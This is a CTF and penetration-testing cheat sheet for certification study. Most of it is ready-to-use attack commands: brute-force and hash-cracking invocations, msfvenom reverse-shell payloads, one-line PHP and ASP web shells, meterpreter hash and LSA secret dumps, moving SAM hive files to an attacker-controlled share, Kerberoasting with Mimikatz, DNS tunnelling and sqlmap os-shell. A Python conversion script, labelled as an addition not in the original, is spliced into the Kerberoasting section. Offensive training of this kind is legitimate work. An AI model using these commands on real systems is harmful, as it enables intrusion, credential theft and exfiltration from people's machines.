CTF Cheat Sheet
This is a list of common commands you may find yourself using in CTF exercises, vulnerable labs and machines, or penetration testing courses. They can also be useful for the eJPT, OSCP and Hack The Box CPTS if you are pursuing any of those certifications. You are responsible for ensuring the commands you are using are allowed on your exam!
Please keep in mind many skills do not translate well to a cheat sheet format. Burp Suite and Zap Proxy, Vulnerability Scanning, Command Injection, and other topics are better covered in tutorials, classes, or videos. This is intended to save time by keeping some common command and tool examples in one place, not to take the place of training.
DISCLAIMER: Do not use ANY of these tools or commands unless you have permission to access the device you are testing. Some of these commands are unsafe and NOISY so don’t be a criminal and use this information responsibly!
Information Gathering
NMAP:
standard scan with scripts, version detection, no pings:
sudo nmap -sC -sV -Pn <host>
scan all ports, output all formats:
sudo nmap -p- -oA scan.txt <host>
scan top 1000 ports, OS detection:
sudo nmap --top-ports 1000 -O <host>
aggressive scan, all ports, output all formats:
sudo nmap -A -p- -iL <hosts.txt> -vv -oA agscan.txt
Find/run specific scripts:
locate scripts/<service>
sudo nmap --script <script name> -p<port> <host>
Host discovery:
sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5
(outputs to file tnet and lists IPs in console)
Host discovery using list:
sudo nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5
WEB ENUMERATION:
Initial enumeration:
$ nikto -host <IP>
$ whatweb -a3 https://<url> -v
$ wafw00f -v https://<url>
Create wordlist via cewl:
$ cewl -m5 --lowercase -w wordlist.txt http://<url>
DNS:
Dig examples:
$ dig @10.129.212.240 -t ANY inlanefreight.htb
$ dig @10.129.212.240 -t NS inlanefreight.htb
$ dig @10.129.212.240 -t TXT inlanefreight.htb
Zone transfers:
$ nslookup -type=NS zonetransfer.me
$ nslookup -type=any -query=AXFR zonetransfer.me nsztm1.digi.ninja
$ nslookup -type=A -query=AXFR internal.inlanefreight.htb 10.129.212.240
FUZZING:
Virtual host via curl:
$ curl -s http://192.168.10.10 -H "Host: <url>"
vHost Fuzzing (-fs filters out responses of the given size, i.e. the default response for unknown hosts):
$ ffuf -w ./vhosts -u http://<url> -H "HOST: FUZZ.<url>" -fs 612
$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/fierce-hostlist.txt -u http://<url> -H "HOST: FUZZ.<url>" -fs 10918
Directory Fuzzing:
$ feroxbuster --url http://<url>/
$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 100 -u http://<url>
$ ffuf -recursion -recursion-depth 1 -u http://<url>/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
Content Fuzzing:
gobuster content:
Content (generic)
$ gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .html,.txt,.xml,.bak,.old
Content IIS
$ gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .asp,.aspx,.txt,.ini,.tmp,.bak,.old
Content Apache
$ gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .js,.jsp,.php,.txt,.tmp,.bak,.old
ffuf content:
$ ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://<url>/FOLDERS/WORDLISTEXTENSIONS
$ ffuf -w /usr/share/wordlists/dirb/common.txt:FUZZ -u http://<url>/FUZZ.php
Pillaging
WINDOWS BUILT IN ENUMERATION:
Enumerating Installed Programs:
C:\> wmic product get name
C:\> dir "C:\Program Files (x86)\"
Checking Windows Version
PS C:\> [environment]::OSVersion.Version
Enumerating Local Users:
C:\> dir C:\Users\
Enumerating Local Ports:
C:\> netstat -ano
Enumerating Running Service:
PS C:\> get-service | ? {$_.DisplayName -like 'Druva*'}
Networking Commands:
Lists all known hosts stored in the arp table:
C:\> arp -a
Prints out all adapter settings for the host:
C:\> ipconfig /all
Displays the routing table:
C:\> route print
Displays the status of the host's firewall:
C:\> netsh advfirewall show state
Get drives/shares:
PS C:\> Get-WmiObject Win32_NetworkConnection | Select-Object RemoteName, LocalName | Sort-Object LocalName | Format-Table -AutoSize
Find creds:
DIR
C:\>dir n:\*cred* /s /b
C:\>dir n:\*secret* /s /b
Windows CMD - Findstr
c:\>findstr /s /i cred n:\*.*
Find plaintext passwords:
C:\> findstr /si password *.xml *.ini *.txt
Windows PowerShell - Select-String
PS C:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
LINUX BUILT IN ENUMERATION:
Enumerate Users:
$ grep 'sh$' /etc/passwd
$ ls /home/
Installed packages:
$ dpkg -l
Locate config files
$ find . | grep conf
Check sudo privileges:
$ sudo -l
Running processes:
$ ps -faux
Show routing table:
$ netstat -rn
Show active connections:
$ netstat -ptan
File transfers:
Python HTTP server
$ sudo python3 -m http.server 80
Python FTP server:
$ python3 -m pyftpdlib -w --user=username --password=password
$ curl --user username:password ftp://127.0.0.1:2121/
SSH SCP:
$ scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
SMB/Samba transfer from Linux to Windows:
Creating a Share with smbserver.py
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support AttkShare /home/kali/smbshare
Copy file from share to working directory:
C:\>copy \\<ip>\AttkShare\WinPEAS.zip WinPEAS.zip
Moving files to Share:
C:\> move sam.save \\<ip>\AttkShare
1 file(s) moved.
C:\> move security.save \\<ip>\AttkShare
1 file(s) moved.
SMB transfer if samba is present:
Start smbserver on attack box:
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/kali/OSCP/
Transfer from host:
$ smbclient //server/share -c 'put local-file'
Base64 transfer:
$ base64 shell.sh -w 0
<SNIP>
$ echo <SNIP> | base64 -d > shell.sh
Password Attacks
ONLINE/NETWORK ATTACKS:
Hydra:
$ hydra -L user.list -P password.list ssh://<host>
$ hydra -l username -P password.list rdp://<host>
$ hydra -L user.list -P password.list smb://<host>
non-standard port:
$ hydra -L user.list -P password.list -f ftp://<host>:212
Medusa:
$ medusa -M ftp -h <host> -U path/to/username_file -P path/to/password_file
$ medusa -M http -h <host> -u username -p password -m USER-AGENT:"Agent"
$ medusa -M smbnt -H path/to/hosts_file -C path/to/pwdump_file -u username -m PASS:HASH
$ medusa -h <host> -u username -P Password_List.txt -M ssh -n 22
crackmapexec:
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
OFFLINE ATTACKS:
johntheripper:
Wordlist Mode:
$ john --wordlist=<wordlist_file> --rules <hash_file>
Built-in wordlist, specified format:
$ john --format=sha256 hashes_to_crack.txt
Net-NTLMv2 hash cracking with hashcat (mode 5600; use -m 1000 for plain NTLM hashes from a SAM dump):
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Exploitation
Locating Exploits with searchsploit:
$ searchsploit <service> <version>
Copy to working directory with searchsploit:
$ searchsploit -m php/webapps/49909.py
msfvenom examples:
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > /root/Downloads/exploits/exploit.elf
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.sh
Linux bind shell x64 single stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Linux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > /root/Downloads/exploits/exploit.exe
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
Windows Meterpreter bind shell
msfvenom -p windows/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f exe > shell.exe
Windows CMD Multi Stage
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows CMD Single Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.56 LPORT=445 -f dll -o rshell.dll
Scripting Languages
Python:
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > exploit.py
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > exploit.pl
metasploit:
Specific Search
msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft
msf6 > use <result number>
Searching for Specific Payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
Permanent Target Specification
msf6 exploit(windows/smb/ms17_010_psexec) > setg RHOSTS <IP>
Stored Credentials
msf6 > creds -h
Stored Loot
msf6 > loot -h
Interact with session
msf6 > sessions -i <num>
meterpreter commands:
meterpreter > help
meterpreter > getuid
Local Exploit Suggester
meterpreter > bg
Background session 1? [y/N] y
msf6 exploit(windows/iis/iis_webdav_upload_asp) > search local_exploit_suggester
Dumping Hashes with meterpreter
meterpreter > hashdump
meterpreter > lsa_dump_sam
LSA Secrets Dump
meterpreter > lsa_dump_secrets
Privilege Escalation
WINDOWS:
winPEAS Enumeration:
.\winPEASany.exe quiet servicesinfo
.\winPEASany.exe quiet applicationsinfo
.\winPEASany.exe quiet windowscreds
.\winPEASany.exe quiet filesinfo userinfo
.\winPEASany.exe quiet cmd windowscreds
.\winPEAS.exe quiet cmd searchfast filesinfo
.\winPEAS.exe quiet processinfo
Scheduled Tasks:
C:\>schtasks /query /fo LIST /v
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Running applications
C:\> tasklist /V
Current User Privileges
C:\htb> whoami /priv
Current User Group Information
C:\htb> whoami /groups
Get All Users
C:\htb> net user
Get All Groups
C:\htb> net localgroup
Details About a Group
C:\htb> net localgroup administrators
Get Password Policy & Other Account Information
C:\htb> net accounts
Hot Potato - NTLM relay attack to gain SYSTEM, uses SMB Relay
./potato.exe -ip <IP> -cmd "C:\<shell.exe>" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
RDP access via linux:
$ xfreerdp /u:user /p:password321 /cert:ignore /v:<IP>
LINUX:
Check sudo privileges:
$ sudo -l
Enumerate Users
$ grep 'sh$' /etc/passwd
$ ls /home/
SSH Key locations:
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
SCP Linpeas with SSH access:
$ scp -P <port> linpeas.sh user1@<IP>:/home/<user>
$ scp -i ~/.ssh/id_rsa FILENAME USER@SERVER:/home/USER/FILENAME
Active Directory
nmap scanning:
Script scan on SMB ports with OS detection:
$ sudo nmap -sV -sC -p 139,445 -Pn -O <host>
SMB Vulnerability scan:
$ sudo nmap -sV --script=smb-vuln* -p 139,445 <host>
Built-in Enumeration:
User Search
PS C:\> dsquery user
Computer Search
PS C:\> dsquery computer
Wildcard Search
PS C:\> dsquery * "CN=Users,DC=<domain>,DC=LOCAL"
WMIC:
Prints the patch level and description of the Hotfixes applied
PS C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
Displays basic host information to include any attributes within the list
PS C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
A listing of all processes on host
PS C:\> wmic process list /format:list
Displays information about the Domain and Domain Controllers
PS C:\> wmic ntdomain list /format:list
Displays information about all local accounts and any domain accounts that have logged into the device
PS C:\> wmic useraccount list /format:list
Information about all local groups
PS C:\> wmic group list /format:list
Dumps information about any system accounts that are being used as service accounts.
PS C:\> wmic sysaccount list /format:list
ActiveDirectory PowerShell Modules:
Discover Modules:
PS C:\> Get-Module
Import if needed:
PS C:\htb> Import-Module ActiveDirectory
Domain info:
PS C:\> Get-ADDomain
Get users (susceptible to kerberoast):
PS C:\> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Check trusts:
PS C:\> Get-ADTrust -Filter *
Group Enumeration:
PS C:\> Get-ADGroup -Filter * | select name
PS C:\> Get-ADGroup -Identity "<group name>"
Group membership:
PS C:\> Get-ADGroupMember -Identity "Backup Operators"
Enumerating Trust Relationships:
Using Get-ADTrust
PS C:\htb> Import-Module activedirectory
PS C:\htb> Get-ADTrust -Filter *
Checking for Existing Trusts using Get-DomainTrust from PowerView
PS C:\> Import-Module .\PowerView.ps1
PS C:\htb> Get-DomainTrust
Using Get-DomainTrustMapping
PS C:\htb> Get-DomainTrustMapping
Checking Users in the Child Domain using Get-DomainUser
PS C:\htb> Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
Bloodhound data collection:
From Linux:
$ sudo bloodhound-python -u '<user>' -p '<password>' -ns <host> -d <domain> -c all
Sharphound to collect data locally:
PS C:\> .\SharpHound.exe -c All --zipfilename ILFREIGHT
PowerView:
PS C:\> Import-Module .\PowerView.ps1
Domain User Information
PS C:\> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
Recursive Group Membership
PS C:\> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Trust Enumeration
PS C:\> Get-DomainTrustMapping
Testing for Local Admin Access
PS C:\> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
Finding Users With SPN Set (kerberoasting)
PS C:\> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Enumerating the Remote Desktop Users Group with PowerView:
PS C:\> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
Enumerating the Remote Management Users Group
PS C:\> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
SharpView, a .NET port of PowerView:
Check options:
PS C:\> .\SharpView.exe Get-DomainUser -Help
User info:
PS C:\> .\SharpView.exe Get-DomainUser -Identity forend
Enumeration from Linux:
With credentials:
crackmapexec:
Domain Enumeration:
$ sudo crackmapexec smb <host> -u <user> -p <password> --users
$ sudo crackmapexec smb <host> -u <user> -p <password> --groups
$ sudo crackmapexec smb <host> -u <user> -p <password> --loggedon-users
Enumerating Shares:
$ sudo crackmapexec smb <host> -u <user> -p <password> --shares
$ sudo crackmapexec smb <host> -u <user> -p <password> -M spider_plus --share '<share name>'
When completed, crackmapexec writes the results to a JSON file located at /tmp/cme_spider_plus/<ip of host>
smbmap:
Enumerating shares:
$ smbmap -u <user> -p <password> -d <DOMAIN> -H <host>
Recursive List Of All Directories:
$ smbmap -u <user> -p <password> -d <DOMAIN> -H <host> -R '<share name>' --dir-only
psexec.py:
psexec.py <domain>/<user>:'<password>'@<host>
Kerberoasting example:
Extracting Tickets from Memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
Preparing the Base64 Blob for Cracking
$ echo "<base64 blob>" | tr -d \\n
Extracting the Kerberos Ticket using kirbi2john.py
$ python2.7 kirbi2john.py sqldev.kirbi
This creates a file called crack_file in john's format. The file must then be rewritten into hashcat's krb5tgs (mode 13100) format.
Modifying crack_file for Hashcat
$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > tgs_hashcat
Viewing/Checking the Prepared Hash
$ cat tgs_hashcat
Cracking the Hash with Hashcat
$ hashcat -m 13100 tgs_hashcat /usr/share/wordlists/rockyou.txt
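As an added example (not from the original cheat sheet), the same crack_file rewrite that the sed line above performs, done in Python with format checks so a malformed line fails loudly instead of producing a hash hashcat silently rejects. It assumes the kirbi2john.py line layout `$krb5tgs$<name>:<32-hex checksum>$<hex edata2>`; the sample line is constructed, not a real ticket.

```python
import re

# Constructed sample in kirbi2john.py output layout (made-up hex, not a real ticket).
SAMPLE_CRACK_FILE = (
    "$krb5tgs$sqldev:"
    + "0123456789abcdef0123456789abcdef"  # 16-byte checksum as 32 hex chars
    + "$" + "deadbeef" * 8                # edata2 (encrypted ticket part)
    + "\n"
)

# kirbi2john layout: $krb5tgs$<name>:<checksum>$<edata2>
KIRBI2JOHN_RE = re.compile(
    r"^\$krb5tgs\$(?P<name>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def to_hashcat_13100(line: str) -> str:
    """Rewrite one kirbi2john line into hashcat mode 13100 layout.

    Mode 13100 expects: $krb5tgs$23$*<name>*$<checksum>$<edata2>
    The 23 is the RC4-HMAC etype, which is what the sed command on the
    page hard-codes as well; AES tickets need modes 19600/19700 instead.
    """
    m = KIRBI2JOHN_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a kirbi2john krb5tgs line: {line!r}")
    if len(m["edata"]) % 2:
        raise ValueError("edata2 has an odd number of hex digits")
    return f"$krb5tgs$23$*{m['name']}*${m['checksum']}${m['edata']}"


def convert_file(text: str) -> list:
    """Convert every non-empty line of a crack_file; returns hashcat lines."""
    return [to_hashcat_13100(ln) for ln in text.splitlines() if ln.strip()]


if __name__ == "__main__":
    for hashcat_line in convert_file(SAMPLE_CRACK_FILE):
        print(hashcat_line)
```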
Pivoting
SSH Port Forwarding:
Executing the Local Port Forward
$ ssh -L 1234:localhost:3306 <user>@<pivothost>
The -L option tells the SSH client to ask the SSH server to forward everything sent to local port 1234 on to localhost:3306 as seen from the server.
Confirming Port Forward with Netstat
$ netstat -antp | grep 1234
Confirming Port Forward with Nmap
$ nmap -v -sV -p1234 localhost
Similarly, to forward several ports from the pivot host to your localhost, add one -L localport:server:port argument per port. The command below also forwards the Apache web server's port 80 to local port 8080 on the attack host.
Multiple Port Forwarding
$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 <user>@<pivothost>
Proxychains:
Update proxychains.conf:
$ vi /etc/proxychains.conf
Checking /etc/proxychains.conf
$ tail -4 /etc/proxychains.conf
Using Nmap with Proxychains
$ proxychains nmap -v -sn 172.16.5.1-200
Using xfreerdp with Proxychains
$ proxychains xfreerdp /v:<host> /u:<user> /p:<password>
Port forwarding with meterpreter:
meterpreter > help portfwd
meterpreter > portfwd add -l 3300 -p 3389 -r <host>
Connecting to Windows Target through localhost
$ xfreerdp /v:localhost:3300 /u:<user> /p:<password>
DNS Tunneling with dnscat2:
Starting the dnscat2 server on attack
$ sudo ruby dnscat2.rb --dns host=<IP>,port=53,domain=<domain> --no-cache
Importing dnscat2.ps1 on target:
PS C:\> Import-Module .\dnscat2.ps1
Starting dnscat on target:
PS C:\> Start-Dnscat2 -DNSserver <IP> -Domain <domain> -PreSharedSecret <secretkey> -Exec cmd
SOCKS5 Tunneling with chisel:
Transferring Chisel Binary to Linux Pivot Host via SSH:
$ scp chisel <user>@<IP>:~/
Running the Chisel Server on the Pivot Host:
$ ./chisel server -v -p 1234 --socks5
Connecting to the Chisel Server
$ ./chisel client -v <IP>:1234 socks
Editing & Confirming proxychains.conf
$ vi /etc/proxychains.conf
$ tail -4 /etc/proxychains.conf
Pivoting to Windows target
$ proxychains xfreerdp /v:<IP> /u:<user> /p:<password>
Web Hacking
Check for verbs via curl:
$ curl -i -X OPTIONS http://SERVER_IP:PORT/
nmap Web Discovery, open ports, input list:
$ nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
Running eyewitness with nmap results:
$ eyewitness --web -x web_discovery.xml -d <domain name for output>
Simple PHP command shell:
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
Simple ASP command shell:
$ echo "<% eval request('cmd') %>" > shell.asp
msfvenom PHP reverse shell:
$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
SQLMAP:
Simple example:
$ sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
POST Example:
$ sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
PUT Example:
$ sqlmap -u www.example.com --data='id=1' --method PUT
Full Request example:
$ sqlmap -r req.txt
Schema Enumeration:
$ sqlmap -u "http://www.example.com/?id=1" --schema
Table Enumeration:
$ sqlmap -u "http://www.example.com/?id=1" --tables -D <database>
Dump table data:
$ sqlmap -u "http://www.example.com/?id=1" --dump -T <table> -D <database>
Search for tables with names like 'user':
$ sqlmap -u "http://www.example.com/?id=1" --search -T user
Search for columns with names like 'pass':
$ sqlmap -u "http://www.example.com/?id=1" --search -C pass
Read local file:
$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Write local file:
$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
Spawn a shell:
$ sqlmap -u "http://www.example.com/?id=1" --os-shell
Tags: CTF Cheat Sheet, OSCP Cheat Sheet, eJPT Cheat Sheet Last Updated: May 2023